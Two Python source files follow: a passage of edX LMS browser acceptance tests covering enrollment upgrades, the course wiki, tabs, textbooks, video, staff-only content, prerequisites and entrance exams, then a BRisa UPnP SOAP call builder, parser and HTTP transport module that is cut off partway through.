        self.dashboard_page.upgrade_enrollment(self.course_info["display_name"], self.upgrade_page)

        # Select the first contribution option appearing on the page
        self.upgrade_page.indicate_contribution()

        # Proceed to the fake payment page
        self.upgrade_page.proceed_to_payment()

        # Submit payment
        self.fake_payment_page.submit_payment()

        # Expect that one mode_changed enrollment event fired as part of the upgrade
        self.assert_event_emitted_num_times(
            "edx.course.enrollment.mode_changed",
            self.start_time,
            student_id,
            1
        )

        # Expect no enrollment activated event
        self.assert_event_emitted_num_times(
            "edx.course.enrollment.activated",
            self.start_time,
            student_id,
            0
        )

        # Navigate to the dashboard
        self.dashboard_page.visit()

        # Expect that we're enrolled as verified in the course
        enrollment_mode = self.dashboard_page.get_enrollment_mode(self.course_info["display_name"])
        self.assertEqual(enrollment_mode, 'verified')
class CourseWikiTest(UniqueCourseTest):
    """
    Tests that verify the course wiki.
    """

    def setUp(self):
        """
        Initialize pages and install a course fixture.
        """
        super(CourseWikiTest, self).setUp()

        # self.course_info['number'] must be shorter since we are accessing the wiki. See TNL-1751
        self.course_info['number'] = self.unique_id[0:6]

        # Fix: the original assigned self.course_info_page twice; the
        # duplicate assignment has been removed.
        self.course_info_page = CourseInfoPage(self.browser, self.course_id)
        self.course_wiki_page = CourseWikiPage(self.browser, self.course_id)
        self.course_wiki_edit_page = CourseWikiEditPage(self.browser, self.course_id, self.course_info)
        self.tab_nav = TabNavPage(self.browser)

        CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        ).install()

        # Auto-auth register for the course
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

        # Access course wiki page
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Wiki')

    def _open_editor(self):
        """Open the wiki article editor and wait for it to load."""
        self.course_wiki_page.open_editor()
        self.course_wiki_edit_page.wait_for_page()

    def test_edit_course_wiki(self):
        """
        Wiki page by default is editable for students.
        After accessing the course wiki,
        Replace the content of the default page
        Confirm new content has been saved
        """
        content = "hello"
        self._open_editor()
        self.course_wiki_edit_page.replace_wiki_content(content)
        self.course_wiki_edit_page.save_wiki_content()
        actual_content = unicode(self.course_wiki_page.q(css='.wiki-article p').text[0])
        self.assertEqual(content, actual_content)
class HighLevelTabTest(UniqueCourseTest):
    """
    Tests that verify each of the high-level tabs available within a course.
    """

    def setUp(self):
        """
        Initialize pages and install a course fixture.
        """
        super(HighLevelTabTest, self).setUp()

        # self.course_info['number'] must be shorter since we are accessing the wiki. See TNL-1751
        self.course_info['number'] = self.unique_id[0:6]

        self.course_info_page = CourseInfoPage(self.browser, self.course_id)
        self.progress_page = ProgressPage(self.browser, self.course_id)
        self.course_nav = CourseNavPage(self.browser)
        self.tab_nav = TabNavPage(self.browser)
        self.video = VideoPage(self.browser)

        # Install a course with sections/problems, tabs, updates, and handouts
        course_fix = CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        )

        course_fix.add_update(
            CourseUpdateDesc(date='January 29, 2014', content='Test course update1')
        )

        course_fix.add_handout('demoPDF.pdf')

        course_fix.add_children(
            XBlockFixtureDesc('static_tab', 'Test Static Tab'),
            XBlockFixtureDesc('chapter', 'Test Section').add_children(
                XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
                    XBlockFixtureDesc('problem', 'Test Problem 1', data=load_data_str('multiple_choice.xml')),
                    XBlockFixtureDesc('problem', 'Test Problem 2', data=load_data_str('formula_problem.xml')),
                    XBlockFixtureDesc('html', 'Test HTML'),
                )
            ),
            XBlockFixtureDesc('chapter', 'Test Section 2').add_children(
                XBlockFixtureDesc('sequential', 'Test Subsection 2'),
                XBlockFixtureDesc('sequential', 'Test Subsection 3'),
            )
        ).install()

        # Auto-auth register for the course
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    def test_course_info(self):
        """
        Navigate to the course info page.
        """
        # Navigate to the course info page from the progress page
        self.progress_page.visit()
        self.tab_nav.go_to_tab('Course Info')

        # Expect just one update
        self.assertEqual(self.course_info_page.num_updates, 1)

        # Expect a link to the demo handout pdf
        handout_links = self.course_info_page.handout_links
        self.assertEqual(len(handout_links), 1)
        self.assertIn('demoPDF.pdf', handout_links[0])

    def test_progress(self):
        """
        Navigate to the progress page.
        """
        # Navigate to the progress page from the info page
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Progress')

        # We haven't answered any problems yet, so assume scores are zero
        # Only problems should have scores; so there should be 2 scores.
        CHAPTER = 'Test Section'
        SECTION = 'Test Subsection'
        EXPECTED_SCORES = [(0, 3), (0, 1)]

        actual_scores = self.progress_page.scores(CHAPTER, SECTION)
        self.assertEqual(actual_scores, EXPECTED_SCORES)

    def test_static_tab(self):
        """
        Navigate to a static tab (course content)
        """
        # From the course info page, navigate to the static tab
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Test Static Tab')
        self.assertTrue(self.tab_nav.is_on_tab('Test Static Tab'))

    def test_wiki_tab_first_time(self):
        """
        Navigate to the course wiki tab. When the wiki is accessed for
        the first time, it is created on the fly.
        """
        course_wiki = CourseWikiPage(self.browser, self.course_id)

        # From the course info page, navigate to the wiki tab
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Wiki')
        self.assertTrue(self.tab_nav.is_on_tab('Wiki'))

        # Assert that a default wiki is created
        expected_article_name = "{org}.{course_number}.{course_run}".format(
            org=self.course_info['org'],
            course_number=self.course_info['number'],
            course_run=self.course_info['run']
        )
        self.assertEqual(expected_article_name, course_wiki.article_name)

    def test_courseware_nav(self):
        """
        Navigate to a particular unit in the courseware.
        """
        # Navigate to the courseware page from the info page
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Courseware')

        # Check that the courseware navigation appears correctly
        EXPECTED_SECTIONS = {
            'Test Section': ['Test Subsection'],
            'Test Section 2': ['Test Subsection 2', 'Test Subsection 3']
        }

        actual_sections = self.course_nav.sections
        for section, subsections in EXPECTED_SECTIONS.iteritems():
            self.assertIn(section, actual_sections)
            # Fix: use the unpacked 'subsections' value instead of
            # redundantly re-indexing EXPECTED_SECTIONS (the loop variable
            # was previously unused).
            self.assertEqual(actual_sections[section], subsections)

        # Navigate to a particular section
        self.course_nav.go_to_section('Test Section', 'Test Subsection')

        # Check the sequence items
        EXPECTED_ITEMS = ['Test Problem 1', 'Test Problem 2', 'Test HTML']

        actual_items = self.course_nav.sequence_items
        self.assertEqual(len(actual_items), len(EXPECTED_ITEMS))
        for expected in EXPECTED_ITEMS:
            self.assertIn(expected, actual_items)
class PDFTextBooksTabTest(UniqueCourseTest):
    """
    Tests that verify each of the textbook tabs available within a course.
    """

    def setUp(self):
        """
        Initialize pages and install a course fixture.
        """
        super(PDFTextBooksTabTest, self).setUp()
        self.course_info_page = CourseInfoPage(self.browser, self.course_id)
        self.tab_nav = TabNavPage(self.browser)

        # Build a course fixture and attach two PDF textbooks to it.
        course_fix = CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        )
        for book_num in range(1, 3):
            chapter = {"title": "Chapter Of Book {}".format(book_num), "url": ""}
            course_fix.add_textbook("PDF Book {}".format(book_num), [chapter])
        course_fix.install()

        # Log in and register for the course via auto-auth.
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    def test_verify_textbook_tabs(self):
        """
        Test multiple pdf textbooks loads correctly in lms.
        """
        self.course_info_page.visit()

        # Visiting each tab fails if the corresponding textbook tab does
        # not load.
        for book_num in range(1, 3):
            self.tab_nav.go_to_tab("PDF Book {}".format(book_num))
class VideoTest(UniqueCourseTest):
    """
    Navigate to a video in the courseware and play it.
    """

    def setUp(self):
        """
        Initialize pages and install a course fixture.
        """
        super(VideoTest, self).setUp()

        self.course_info_page = CourseInfoPage(self.browser, self.course_id)
        self.course_nav = CourseNavPage(self.browser)
        self.tab_nav = TabNavPage(self.browser)
        self.video = VideoPage(self.browser)

        # Install a course fixture with a video component
        course_fix = CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        )

        course_fix.add_children(
            XBlockFixtureDesc('chapter', 'Test Section').add_children(
                XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
                    XBlockFixtureDesc('vertical', 'Test Unit').add_children(
                        XBlockFixtureDesc('video', 'Video')
                    )))).install()

        # Auto-auth register for the course
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    # NOTE(review): this test is skipped pending BLD-563; the body below is
    # kept intact (including the commented-out promise) so it can be
    # re-enabled without reconstruction.
    @skip("BLD-563: Video Player Stuck on Pause")
    def test_video_player(self):
        """
        Play a video in the courseware.
        """
        # Navigate to a video
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Courseware')

        # The video should start off paused
        # Since the video hasn't loaded yet, it's elapsed time is 0
        self.assertFalse(self.video.is_playing)
        self.assertEqual(self.video.elapsed_time, 0)

        # Play the video
        self.video.play()

        # Now we should be playing
        self.assertTrue(self.video.is_playing)

        # Commented the below EmptyPromise, will move to its page once this test is working and stable
        # Also there is should be no Promise check in any test as this should be done in Page Object
        # Wait for the video to load the duration
        # EmptyPromise(
        #     lambda: self.video.duration > 0,
        #     'video has duration', timeout=20
        # ).fulfill()

        # Pause the video
        self.video.pause()

        # Expect that the elapsed time and duration are reasonable
        # Again, we can't expect the video to actually play because of
        # latency through the ssh tunnel
        self.assertGreaterEqual(self.video.elapsed_time, 0)
        self.assertGreaterEqual(self.video.duration, self.video.elapsed_time)
class VisibleToStaffOnlyTest(UniqueCourseTest):
    """
    Tests that content with visible_to_staff_only set to True cannot be viewed by students.
    """
    def setUp(self):
        """
        Install a course fixture mixing locked ('visible_to_staff_only')
        and unlocked subsections/units:
          * a subsection holding one locked and one unlocked unit
          * a fully visible subsection
          * a subsection locked at the subsection level
        """
        super(VisibleToStaffOnlyTest, self).setUp()

        course_fix = CourseFixture(
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run'],
            self.course_info['display_name']
        )

        course_fix.add_children(
            XBlockFixtureDesc('chapter', 'Test Section').add_children(
                XBlockFixtureDesc('sequential', 'Subsection With Locked Unit').add_children(
                    XBlockFixtureDesc('vertical', 'Locked Unit', metadata={'visible_to_staff_only': True}).add_children(
                        XBlockFixtureDesc('html', 'Html Child in locked unit', data="<html>Visible only to staff</html>"),
                    ),
                    XBlockFixtureDesc('vertical', 'Unlocked Unit').add_children(
                        XBlockFixtureDesc('html', 'Html Child in unlocked unit', data="<html>Visible only to all</html>"),
                    )
                ),
                XBlockFixtureDesc('sequential', 'Unlocked Subsection').add_children(
                    XBlockFixtureDesc('vertical', 'Test Unit').add_children(
                        XBlockFixtureDesc('html', 'Html Child in visible unit', data="<html>Visible to all</html>"),
                    )
                ),
                XBlockFixtureDesc('sequential', 'Locked Subsection', metadata={'visible_to_staff_only': True}).add_children(
                    XBlockFixtureDesc('vertical', 'Test Unit').add_children(
                        XBlockFixtureDesc(
                            'html', 'Html Child in locked subsection', data="<html>Visible only to staff</html>"
                        )
                    )
                )
            )
        ).install()

        self.courseware_page = CoursewarePage(self.browser, self.course_id)
        self.course_nav = CourseNavPage(self.browser)

    def test_visible_to_staff(self):
        """
        Scenario: All content is visible for a user marked is_staff (different from course staff)
        Given some of the course content has been marked 'visible_to_staff_only'
        And I am logged on with an account marked 'is_staff'
        Then I can see all course content
        """
        AutoAuthPage(self.browser, username="STAFF_TESTER", email="johndoe_staff@example.com",
                     course_id=self.course_id, staff=True).visit()

        self.courseware_page.visit()
        # A global-staff user sees all three subsections
        self.assertEqual(3, len(self.course_nav.sections['Test Section']))

        # ...including both the locked and the unlocked unit
        self.course_nav.go_to_section("Test Section", "Subsection With Locked Unit")
        self.assertEqual(["Html Child in locked unit", "Html Child in unlocked unit"], self.course_nav.sequence_items)

        self.course_nav.go_to_section("Test Section", "Unlocked Subsection")
        self.assertEqual(["Html Child in visible unit"], self.course_nav.sequence_items)

        self.course_nav.go_to_section("Test Section", "Locked Subsection")
        self.assertEqual(["Html Child in locked subsection"], self.course_nav.sequence_items)

    def test_visible_to_student(self):
        """
        Scenario: Content marked 'visible_to_staff_only' is not visible for students in the course
        Given some of the course content has been marked 'visible_to_staff_only'
        And I am logged on with an authorized student account
        Then I can only see content without 'visible_to_staff_only' set to True
        """
        AutoAuthPage(self.browser, username="STUDENT_TESTER", email="johndoe_student@example.com",
                     course_id=self.course_id, staff=False).visit()

        self.courseware_page.visit()
        # The locked subsection is hidden entirely, leaving two subsections
        self.assertEqual(2, len(self.course_nav.sections['Test Section']))

        # Within the mixed subsection only the unlocked unit remains
        self.course_nav.go_to_section("Test Section", "Subsection With Locked Unit")
        self.assertEqual(["Html Child in unlocked unit"], self.course_nav.sequence_items)

        self.course_nav.go_to_section("Test Section", "Unlocked Subsection")
        self.assertEqual(["Html Child in visible unit"], self.course_nav.sequence_items)
class TooltipTest(UniqueCourseTest):
    """
    Tests that tooltips are displayed
    """

    def setUp(self):
        """
        Initialize pages and install a course fixture.
        """
        super(TooltipTest, self).setUp()

        self.course_info_page = CourseInfoPage(self.browser, self.course_id)
        self.tab_nav = TabNavPage(self.browser)

        # Build a course containing a static tab plus a subsection with two
        # problems and an html block, then push it to the platform.
        fixture = CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        )
        fixture.add_children(
            XBlockFixtureDesc('static_tab', 'Test Static Tab'),
            XBlockFixtureDesc('chapter', 'Test Section').add_children(
                XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
                    XBlockFixtureDesc('problem', 'Test Problem 1', data=load_data_str('multiple_choice.xml')),
                    XBlockFixtureDesc('problem', 'Test Problem 2', data=load_data_str('formula_problem.xml')),
                    XBlockFixtureDesc('html', 'Test HTML'),
                )
            )
        ).install()

        self.courseware_page = CoursewarePage(self.browser, self.course_id)

        # Log in and register for the course via auto-auth.
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    def test_tooltip(self):
        """
        Verify that tooltips are displayed when you hover over the sequence nav bar.
        """
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Courseware')
        self.assertTrue(self.courseware_page.tooltips_displayed())
class PreRequisiteCourseTest(UniqueCourseTest):
    """
    Tests that pre-requisite course messages are displayed
    """
    def setUp(self):
        """
        Install the course under test plus a second course that will be
        configured as its pre-requisite, and set up the page objects.
        """
        super(PreRequisiteCourseTest, self).setUp()

        # The course under test
        CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        ).install()

        # A second course, used as the pre-requisite
        self.prc_info = {
            'org': 'test_org',
            'number': self.unique_id,
            'run': 'prc_test_run',
            'display_name': 'PR Test Course' + self.unique_id
        }

        CourseFixture(
            self.prc_info['org'], self.prc_info['number'],
            self.prc_info['run'], self.prc_info['display_name']
        ).install()

        pre_requisite_course_key = generate_course_key(
            self.prc_info['org'],
            self.prc_info['number'],
            self.prc_info['run']
        )
        # Stringified key, used to pick the option in the settings dropdown
        self.pre_requisite_course_id = unicode(pre_requisite_course_key)

        self.dashboard_page = DashboardPage(self.browser)
        # Studio settings page for the course under test
        self.settings_page = SettingsPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )

        # Auto-auth register for the course
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    def test_dashboard_message(self):
        """
        Scenario: Any course where there is a Pre-Requisite course Student dashboard should have
        appropriate messaging.
        Given that I am on the Student dashboard
        When I view a course with a pre-requisite course set
        Then At the bottom of course I should see course requirements message.'
        """
        # visit dashboard page and make sure there is not pre-requisite course message
        self.dashboard_page.visit()
        self.assertFalse(self.dashboard_page.pre_requisite_message_displayed())

        # Logout and login as a staff.
        LogoutPage(self.browser).visit()
        AutoAuthPage(self.browser, course_id=self.course_id, staff=True).visit()

        # visit course settings page and set pre-requisite course
        self.settings_page.visit()
        self._set_pre_requisite_course()

        # Logout and login as a student.
        LogoutPage(self.browser).visit()
        AutoAuthPage(self.browser, course_id=self.course_id, staff=False).visit()

        # visit dashboard page again now it should have pre-requisite course message
        self.dashboard_page.visit()
        # Wait for the course listing to render before checking the message
        EmptyPromise(lambda: self.dashboard_page.available_courses > 0, 'Dashboard page loaded').fulfill()
        self.assertTrue(self.dashboard_page.pre_requisite_message_displayed())

    def _set_pre_requisite_course(self):
        """
        set pre-requisite course
        """
        select_option_by_value(self.settings_page.pre_requisite_course_options, self.pre_requisite_course_id)
        self.settings_page.save_changes()
class ProblemExecutionTest(UniqueCourseTest):
    """
    Tests of problems.
    """

    def setUp(self):
        """
        Initialize pages and install a course fixture.
        """
        super(ProblemExecutionTest, self).setUp()

        self.course_info_page = CourseInfoPage(self.browser, self.course_id)
        self.course_nav = CourseNavPage(self.browser)
        self.tab_nav = TabNavPage(self.browser)

        # Install a course with sections and problems.
        course_fix = CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        )
        # python_lib.zip supplies the 'number_helpers' module imported by
        # the problem's <script> block below.
        course_fix.add_asset(['python_lib.zip'])
        course_fix.add_children(
            XBlockFixtureDesc('chapter', 'Test Section').add_children(
                XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
                    XBlockFixtureDesc('problem', 'Python Problem', data=dedent(
                        """\
                        <problem>
                        <script type="loncapa/python">
                        from number_helpers import seventeen, fortytwo
                        oneseven = seventeen()

                        def check_function(expect, ans):
                            if int(ans) == fortytwo(-22):
                                return True
                            else:
                                return False
                        </script>

                        <p>What is the sum of $oneseven and 3?</p>

                        <customresponse expect="20" cfn="check_function">
                            <textline/>
                        </customresponse>
                        </problem>
                        """
                    ))
                )
            )
        ).install()

        # Auto-auth register for the course
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    def test_python_execution_in_problem(self):
        """
        Answer the problem and verify that the server-side python in the
        problem's script block actually ran.
        """
        # Navigate to the problem page
        self.course_info_page.visit()
        self.tab_nav.go_to_tab('Courseware')
        self.course_nav.go_to_section('Test Section', 'Test Subsection')

        problem_page = ProblemPage(self.browser)
        # NOTE(review): the displayed problem name appears upper-cased here
        self.assertEqual(problem_page.problem_name, 'PYTHON PROBLEM')

        # Does the page have computation results? The '$oneseven' template
        # variable is expected to have been substituted with 17.
        self.assertIn("What is the sum of 17 and 3?", problem_page.problem_text)

        # Fill in the answer correctly.
        problem_page.fill_answer("20")
        problem_page.click_check()
        self.assertTrue(problem_page.is_correct())

        # Fill in the answer incorrectly.
        problem_page.fill_answer("4")
        problem_page.click_check()
        self.assertFalse(problem_page.is_correct())
class EntranceExamTest(UniqueCourseTest):
    """
    Tests that course has an entrance exam.
    """

    def setUp(self):
        """
        Install an empty course and prepare the page objects needed to
        toggle the entrance-exam setting and inspect the courseware.
        """
        super(EntranceExamTest, self).setUp()

        CourseFixture(
            self.course_info['org'], self.course_info['number'],
            self.course_info['run'], self.course_info['display_name']
        ).install()

        self.courseware_page = CoursewarePage(self.browser, self.course_id)
        self.settings_page = SettingsPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )

        # Log in and register for the course via auto-auth.
        AutoAuthPage(self.browser, course_id=self.course_id).visit()

    def test_entrance_exam_section(self):
        """
        Scenario: Any course that is enabled for an entrance exam, should have entrance exam chapter at courseware
        page.
        Given that I am on the courseware page
        When I view the courseware that has an entrance exam
        Then there should be an "Entrance Exam" chapter.'
        """
        exam_link_selector = 'div#accordion nav div h3 a'

        def exam_chapter_visible():
            # True when a chapter link labelled "Entrance Exam" is present.
            return element_has_text(
                page=self.courseware_page,
                css_selector=exam_link_selector,
                text='Entrance Exam'
            )

        # Before the setting is enabled there must be no such chapter.
        self.courseware_page.visit()
        self.courseware_page.wait_for_page()
        self.assertFalse(exam_chapter_visible())

        # Switch to a staff account and enable the entrance exam setting.
        LogoutPage(self.browser).visit()
        AutoAuthPage(self.browser, course_id=self.course_id, staff=True).visit()
        self.settings_page.visit()
        self.settings_page.wait_for_page()
        self.assertTrue(self.settings_page.is_browser_on_page())
        self.settings_page.entrance_exam_field.click()
        self.settings_page.save_changes()

        # Back as a student, the "Entrance Exam" chapter must now appear.
        LogoutPage(self.browser).visit()
        AutoAuthPage(self.browser, course_id=self.course_id, staff=False).visit()
        self.courseware_page.visit()
        self.courseware_page.wait_for_page()
        self.assertTrue(exam_chapter_visible())
| cselis86/edx-platform | common/test/acceptance/tests/lms/test_lms.py | Python | agpl-3.0 | 39,598 | [
"VisIt"
] | 513c7440d5d78b99f2c618c8be3eaa61ac84b026b7815f01a114de714d68f511 |
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php or see LICENSE file.
# Copyright 2007-2008 Brisa Team <brisa-develop@garage.maemo.org>
#
# Copyright 2001 - Cayce Ullman <http://pywebsvcs.sourceforge.net>
# Copyright 2001 - Brian Matthews <http://pywebsvcs.sourceforge.net>
# Copyright 2001-2003 - Pfizer <http://pywebsvcs.sourceforge.net>
# Copyright 2007-2008 - Frank Scholz <coherence@beebits.net>
""" Parses and builds SOAP calls transparently.
"""
import base64
import http.client
import logging
from xml.etree import ElementTree

from brisa.core.network import parse_xml, parse_url
from brisa.upnp.upnp_defaults import map_upnp_value, map_upnp_type
# Fix: removed the stray trailing semicolon from the USER_AGENT assignment.
USER_AGENT = "BRisa UPnP and DLNA Framework"

# SOAP constants
NS_SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
NS_SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
NS_XSI = "http://www.w3.org/1999/XMLSchema-instance"
NS_XSD = "http://www.w3.org/1999/XMLSchema"

# UPnP error codes mapped to their default human-readable descriptions.
UPNPERRORS = {401: 'Invalid Action',
              402: 'Invalid Args',
              501: 'Action Failed',
              600: 'Argument Value Invalid',
              601: 'Argument Value Out of Range',
              602: 'Optional Action Not Implemented',
              603: 'Out Of Memory',
              604: 'Human Intervention Required',
              605: 'String Argument Too Long',
              606: 'Action Not Authorized',
              607: 'Signature Failure',
              608: 'Signature Missing',
              609: 'Not Encrypted',
              610: 'Invalid Sequence',
              611: 'Invalid Control URL',
              612: 'No Such Session', }
def build_soap_error(status, description='without words'):
    """ Builds an UPnP SOAP error message.

    @param status: error code
    @param description: error default description
    @type status: integer
    @type description: string

    @return: soap call representing the error
    @rtype: string
    """
    fault = ElementTree.Element('s:Fault')
    for tag, text in (('faultcode', 's:Client'),
                      ('faultstring', 'UPnPError')):
        ElementTree.SubElement(fault, tag).text = text
    detail = ElementTree.SubElement(fault, 'detail')
    upnp_error = ElementTree.SubElement(detail, 'UPnPError')
    upnp_error.set('xmlns', 'urn:schemas-upnp-org:control-1-0')
    ElementTree.SubElement(upnp_error, 'errorCode').text = str(status)
    # Fall back to the caller-supplied description for unknown codes.
    ElementTree.SubElement(upnp_error, 'errorDescription').text = \
        UPNPERRORS.get(status, description)
    return build_soap_call(None, fault, encoding=None)
def build_soap_call(method, arguments, encoding=NS_SOAP_ENC,
                    envelope_attrib=None, typed=None, header_args=None):
    """ Builds a soap call.

    @param method: method for the soap call. If set to None, the method element
    will be omitted and arguments will be added directly to the body (error
    message)
    @param arguments: arguments for the call
    @param encoding: encoding for the call
    @param envelope_attrib: envelope attribute
    @param typed: True if typed
    @param header_args: header arguments if any. It should be dict of dict

    @type method: string or None
    @type arguments: dict or ElementTree.Element
    @type encoding: string
    @type envelope_attrib: list
    @type typed: boolean or None
    @type header_args: dict or ElementTree.Element or None

    @return: soap call
    @rtype: string
    """
    envelope = ElementTree.Element("s:Envelope")
    if envelope_attrib:
        for n in envelope_attrib:
            envelope.attrib.update({n[0]: n[1]})
    else:
        envelope.attrib.update({'s:encodingStyle': NS_SOAP_ENC})
        envelope.attrib.update({'xmlns:s': NS_SOAP_ENV})

    qname_ns = NS_XSD

    if isinstance(header_args, dict) and header_args:
        header = ElementTree.SubElement(envelope, "s:Header")
        if encoding:
            header.set("{%s}encodingStyle" % NS_SOAP_ENV, encoding)
        try:
            for header_name, header_args_dict in list(header_args.items()):
                header_name_elem = ElementTree.SubElement(header, header_name)
                if isinstance(header_args_dict, dict):
                    for header_arg_name, header_arg_val in \
                            list(header_args_dict.items()):
                        header_arg_type = map_upnp_type(header_arg_val)
                        header_arg_val = map_upnp_value(header_arg_val)
                        he = ElementTree.SubElement(header_name_elem,
                                                    header_arg_name)
                        # Fix: the original tested the undefined name
                        # 'arg_type' and isinstance() on the builtin 'type'
                        # instead of the header argument's type.
                        if typed and header_arg_type:
                            if not isinstance(header_arg_type,
                                              ElementTree.QName):
                                header_arg_type = ElementTree.QName(
                                    qname_ns, header_arg_type)
                            he.set('{%s}type' % NS_XSI, header_arg_type)
                        he.text = header_arg_val
        except Exception as e:
            # Fix: the original referenced an undefined 'log' name here.
            logging.getLogger(__name__).error(
                "Ignoring soap header due to malformed header_args dict: %s",
                e)
    elif ElementTree.iselement(header_args):
        header = ElementTree.SubElement(envelope, "s:Header")
        header.append(header_args)

    body = ElementTree.SubElement(envelope, "s:Body")

    if method:
        request_elem = ElementTree.SubElement(body, method)
        if encoding:
            request_elem.set("{%s}encodingStyle" % NS_SOAP_ENV, encoding)
    else:
        request_elem = body

    # append the arguments
    if isinstance(arguments, dict):
        for arg_name, arg_val in list(arguments.items()):
            arg_type = map_upnp_type(arg_val)
            arg_val = map_upnp_value(arg_val)
            e = ElementTree.SubElement(request_elem, arg_name)
            if typed and arg_type:
                # Fix: check the argument's type, not the builtin 'type'.
                if not isinstance(arg_type, ElementTree.QName):
                    arg_type = ElementTree.QName(qname_ns, arg_type)
                e.set('{%s}type' % NS_XSI, arg_type)
            e.text = arg_val
    else:
        request_elem.append(arguments)

    # NOTE(review): tostring(..., 'utf-8') already emits an XML declaration,
    # so the output contains two declarations; preserved as-is since peers
    # may depend on the exact wire format — confirm before changing.
    preamble = """<?xml version="1.0" encoding="utf-8"?>"""
    return '%s%s' % (preamble,
                     ElementTree.tostring(envelope, 'utf-8').decode('utf-8'))
def __decode_result(element):
    """ Decodes the result out of an Element. Returns the text, if possible.

    @param element: element to decode the result
    @type element: Element

    @return: decoded value (int, float, bool or string)
    @rtype: int, float, bool or string
    """
    # Fix: renamed the local from 'type', which shadowed the builtin.
    value_type = element.get('{%s}type' % NS_XSI)
    if value_type is not None:
        try:
            prefix, local = value_type.split(":")
            if prefix == 'xsd':
                value_type = local
        except ValueError:
            # No namespace prefix present; use the raw type string.
            pass

    if value_type in ("integer", "int"):
        return int(element.text)
    if value_type in ("float", "double"):
        return float(element.text)
    if value_type == "boolean":
        return element.text == "true"

    return element.text or ""
def parse_soap_call(data):
    """ Parses a soap call and returns a 4-tuple.

    @param data: raw soap XML call data
    @type data: string

    @return: 4-tuple (method_name, args, kwargs, namespace)
    @rtype: tuple
    """
    args = []
    kwargs = {}
    ns = "http://schemas.xmlsoap.org/soap/envelope/"
    tree = parse_xml(data)
    header = tree.find('{%s}Header' % ns)
    kwargs['__header__'] = {}
    # Fix: 'if header:' relies on deprecated Element truthiness and is also
    # False for a present-but-empty header; compare against None instead.
    if header is not None:
        for e in list(header):
            kwargs['__header__'][e.tag] = {}
            for se in list(e):
                kwargs['__header__'][e.tag][se.tag] = {}
                kwargs['__header__'][e.tag][se.tag]['__value__'] = __decode_result(se)
                kwargs['__header__'][e.tag][se.tag]['__attrib__'] = se.attrib
    body = tree.find('{%s}Body' % ns)
    # Fix: Element.getchildren() was removed in Python 3.9; iterate/index
    # the element directly.
    method = list(body)[0]
    method_name = method.tag
    ns = None

    if method_name.startswith('{') and method_name.rfind('}') > 1:
        ns, method_name = method_name[1:].split('}')

    for child in list(method):
        kwargs[child.tag] = __decode_result(child)
        args.append(kwargs[child.tag])

    return method_name, args, kwargs, ns
class SOAPProxy(object):
    """ Proxy for making remote SOAP calls Based on twisted.web.soap.Proxy
    and SOAPpy.
    """

    def __init__(self, url, namespace=None, soap_header=None):
        """ Constructor for the SOAPProxy class.

        @param url: remote SOAP server
        @param namespace: calls namespace as a (prefix, uri) tuple
        @param soap_header: optional mapping of header names to values; keys
        are qualified with the namespace uri

        @type url: string
        @type namespace: tuple
        @type soap_header: dict
        """
        self.url = url
        self.namespace = namespace
        # Fix: the original referenced an undefined name 'ns' here (raising
        # NameError for any non-empty soap_header) and used a mutable
        # default argument ({}) for soap_header.
        if isinstance(soap_header, dict):
            self.soap_header = dict(("{%s}%s" % (namespace[1], k), v)
                                    for k, v in list(soap_header.items()))
        else:
            self.soap_header = {}

    def call_remote(self, soapmethod, **kwargs):
        """ Performs a remote SOAP call.

        @param soapmethod: method to be called
        @param kwargs: args to be passed, can be named.

        @type soapmethod: string
        @type kwargs: dictionary

        @return: the result of the soap call.
        @rtype: string
        """
        ns = self.namespace
        soapaction = '%s#%s' % (ns[1], soapmethod)
        payload = build_soap_call('{%s}%s' % (ns[1], soapmethod),
                                  kwargs, encoding=None,
                                  header_args=self.soap_header)
        try:
            result = HTTPTransport().call(self.url, payload, ns,
                                          soapaction=soapaction,
                                          encoding='utf-8')
        except Exception as e:
            # Not every exception carries a .code attribute; default to 500.
            raise HTTPError(getattr(e, 'code', 500), str(e))
        _, _, res, _ = parse_soap_call(result)
        return res
class HTTPTransport(object):
    """ Wrapper class for a HTTP SOAP call. It contains the call() method that
    can perform calls and return the response payload.
    """

    def call(self, addr, data, namespace, soapaction=None, encoding=None):
        """ Builds and performs an HTTP request. Returns the response payload.

        @param addr: address to receive the request in the form
        schema://hostname:port
        @param data: data to be sent
        @param namespace: call namespace (unused here, kept for interface
        compatibility)
        @param soapaction: soap action to be called
        @param encoding: encoding for the message

        @type addr: string
        @type data: string
        @type soapaction: string
        @type encoding: string

        @return: response payload
        @rtype: string
        """
        # Build a request
        addr = parse_url(addr)
        real_addr = '%s:%d' % (addr.hostname, addr.port)
        real_path = addr.path

        if addr.query != '':
            real_path += '?%s' % addr.query

        if addr.scheme == 'https':
